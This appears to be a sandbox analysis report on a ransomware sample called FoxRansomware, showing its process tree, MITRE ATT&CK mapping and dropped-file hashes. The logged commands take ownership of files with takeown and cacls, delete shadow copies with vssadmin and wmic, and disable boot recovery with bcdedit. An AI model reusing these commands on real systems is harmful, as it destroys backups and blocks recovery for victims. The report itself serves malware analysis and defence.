C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000009J.bin" -nobanner4⤵PID:5644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""2⤵PID:5228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C3⤵PID:1340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"3⤵PID:5196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000A4.bin" -nobanner3⤵PID:260
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000A4.bin" -nobanner4⤵PID:5420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""2⤵PID:5488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C3⤵PID:5756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"3⤵PID:1396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000AF.bin" -nobanner3⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000AF.bin" -nobanner4⤵PID:5532
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""2⤵PID:2656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C3⤵PID:6104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin"3⤵PID:4632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000AP.bin" -nobanner3⤵PID:5368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000AP.bin" -nobanner4⤵PID:1048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin""2⤵PID:5220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" /E /G Admin:F /C3⤵PID:3208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin"3⤵PID:1316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000B5.bin" -nobanner3⤵PID:3692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000B5.bin" -nobanner4⤵PID:4728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"3⤵PID:5192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000F.bin" -nobanner3⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000F.bin" -nobanner4⤵PID:4268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""2⤵PID:4804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C3⤵PID:5528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"3⤵PID:2348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000Q.bin" -nobanner3⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000Q.bin" -nobanner4⤵PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""2⤵PID:4316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C3⤵PID:5760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"3⤵
- Modifies file permissions
PID:5112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000014.bin" -nobanner3⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000014.bin" -nobanner4⤵PID:4092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""2⤵PID:5140
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C3⤵PID:3488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"3⤵PID:360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000058.bin" -nobanner3⤵PID:272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000058.bin" -nobanner4⤵PID:292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""2⤵PID:3184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C3⤵PID:4192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"3⤵PID:716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000004.bin" -nobanner3⤵PID:4324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000004.bin" -nobanner4⤵PID:5364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""2⤵PID:5156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C3⤵PID:5716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"3⤵PID:4692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000H.bin" -nobanner3⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000H.bin" -nobanner4⤵PID:5816
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""2⤵PID:2184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C3⤵PID:4532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"3⤵PID:5128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000S.bin" -nobanner3⤵PID:5768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000S.bin" -nobanner4⤵PID:5392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""2⤵PID:652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C3⤵PID:5420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"3⤵
- Modifies file permissions
PID:4164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000016.bin" -nobanner3⤵PID:3248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000016.bin" -nobanner4⤵PID:3828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""2⤵PID:3432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C3⤵PID:5828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"3⤵PID:6044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000050.bin" -nobanner3⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000050.bin" -nobanner4⤵PID:2536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""2⤵PID:5708
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"3⤵PID:4664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000007E.bin" -nobanner3⤵PID:5400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000007E.bin" -nobanner4⤵PID:5260
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""2⤵PID:3980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C3⤵PID:3208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"3⤵PID:1316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000007O.bin" -nobanner3⤵PID:2228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000007O.bin" -nobanner4⤵PID:3692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""2⤵PID:5220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"3⤵PID:4304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000008D.bin" -nobanner3⤵PID:3984
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000008D.bin" -nobanner4⤵PID:608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""2⤵PID:5080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000008N.bin" -nobanner3⤵PID:4000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000008N.bin" -nobanner4⤵PID:4436
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""2⤵PID:4908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C3⤵PID:5992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"3⤵PID:5300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000093.bin" -nobanner3⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000093.bin" -nobanner4⤵PID:2720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""2⤵PID:4608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C3⤵PID:4876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"3⤵PID:5304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000A9.bin" -nobanner3⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000A9.bin" -nobanner4⤵PID:280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""2⤵PID:3716
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C3⤵PID:4328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"3⤵PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000006S.bin" -nobanner3⤵PID:4872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000006S.bin" -nobanner4⤵PID:4984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\XjGMi7Hl.bat"1⤵PID:2464
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:5848
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5872
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:5168
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:5432
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:5940
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "AssemblyList_4_extended.xml" -nobanner1⤵
- Executes dropped EXE
PID:4296
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD559c12564b0bab0a13f5748da4e61e364
SHA13f0cb143d90d9d097c93e9c9640724e9f4cce42d
SHA25642a39184ab4a1ff5ba85c0a73484ace2b7f5a3665a909d7ed3feda500da7363a
SHA512e858e727f95cfd84ab4570626a21928afab731f102c892ff213cec5e0bba55c20c307fb4d16abe0feb2923761ba7bf466430539e2f318ba1847e41b1144e9549
-
Filesize
3KB
MD503092ca3e27f06fdbd821801564e54ad
SHA1142b7a4e1b5b721fbfc7047c06721400fc39c10b
SHA256bd230567be0f0f0b80670728afcb5b94b37c726c7a5e2cabb3348ecf698477da
SHA512037612a0bbabcddea022be9a193b6184af22fd5b9d5c0d66f0d4c78b8e88870b8d523519d844a6146fec9afa30d286d5d73d8097c9eaaa918756916f4bf1614b
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
64KB
MD539384617afb7b1a4cd7b11d998292e13
SHA187689603aebba6b353bbca3d5a038c0e8e59fd4c
SHA256b41666aedfb669305f37349dfae96eea3f34ae7ba89629a268c2a403302bdbaa
SHA51252be3914e3330330a83463cc2925ffa5d0bdb1a4358f48c1298cc0c5f631a214a8d9328232f95c496642da2300f713a5f0288d6ea6af52fb0e173c1431e442e7
-
Filesize
3KB
MD5dc734225433f3a9b7ba212f32023b1cf
SHA176816e5bfaebbb2007e2a0e979308eb4d7f6da89
SHA25671e68c1021fb643b7c14bd0957fcd8e8fc0eb2d7a6f41f906927f6813daece8f
SHA51222497156b63d4e24b202dc377c83a215ee010f2cbd5023aa7ceeb66c299830839931511b7b42c27c55c28e5f9adb7b27804dbad5529092819ab5a15c4a7ebfb4
-
Filesize
132KB
MD50591109afe668ed63d20cb5516eb00a0
SHA1117b94aeda425423eac8c993659d227e979dee97
SHA2564f368fa39b7ce3c0d9726cadeca0069f7bd536f2875a0b172c20def758e44872
SHA512b6e8671e69ff9f75fd3191a493a5902ed3c5d4df9e0a13eb8fcb38a0fb3affae02275dbaf31755dc7f33a417d0a53d4c2aae054724068b998244f026dbb7efb8
-
Filesize
14B
MD5c74dacdd9331a6698efffe81ff66ac08
SHA179e8ce4bb5cc2436e95fad4a74a31aee7aa63043
SHA25682ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
SHA51224620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
-
Filesize
1.2MB
MD5c82d64850d35cc6a536c11adbd261cf6
SHA19f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
Filesize
9KB
MD5d1a6e14193202a8076cce344fa3ce913
SHA1dc2f78782ddcaefd8a030563d093c4411d46a5cf
SHA256685e3a572511715a68f9567fc590090bfe620746931fe41c566aa460548df61d
SHA5122d211b595317fb0ec9f0d89c5d8422eba3acee4978bd83f3811ce7e4906ee4260e5911715fd0de022db7325ab640a16c788b7ad2d2f086d43e6e0a6c7d102375
-
Filesize
39KB
MD54f2514c2019e88ca6b7f56dbb99e44cb
SHA16c00371c2ebfea9227ec5ede4d28cb1f126cda1d
SHA25606264821349ff348dba3631acd339616973798c1e417510e1583b969d5c3ab3a
SHA5128e7384144cb9c7d74dc979fc3da7a1b3a2b519278845becdf572cb03e4e093a33e7e5e851a6c5b38dc8813322eac4c5a9f2154bd3609b1db6da540ef733478ad
-
Filesize
226B
MD508a5307f51d107ce613ce20216a52095
SHA140081cbac0de611d4e707a6a7ce977797a5ee8a2
SHA256f1ced2796a212a5b051bebf3f1ed08ad1128b4c5c664820e5e53b1ea9e7077bc
SHA512255479fd11d89645e10ef0a8b6baa40b999b22fc94dcbe8fe41133027914e0bb38c2258cca267ce491cd5cf365da2635cf0ef143320f026db2aeab723b6d1df6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
265B
MD59b77f6987d5e3c6bf159d0eca0900037
SHA16edd8355000194b14e28d6145c77b9217b48d763
SHA256a0b4041efb10d053b5eea8433b06c6764b1604509049b46937f4e5fe5a660cd2
SHA512f63de16ff0190df710b722df4bc260cae41f48606933a43274faf11b17148179111bcf61c7a3a5504467dfc867eb590aa1b6cdefadbf0a8e5d41d4f4186cd718
-
Filesize
260B
MD5a27c2ab28b18310a9223d095cad13455
SHA141aaf0ddcf5341715242dd0e50f6b1bff376011e
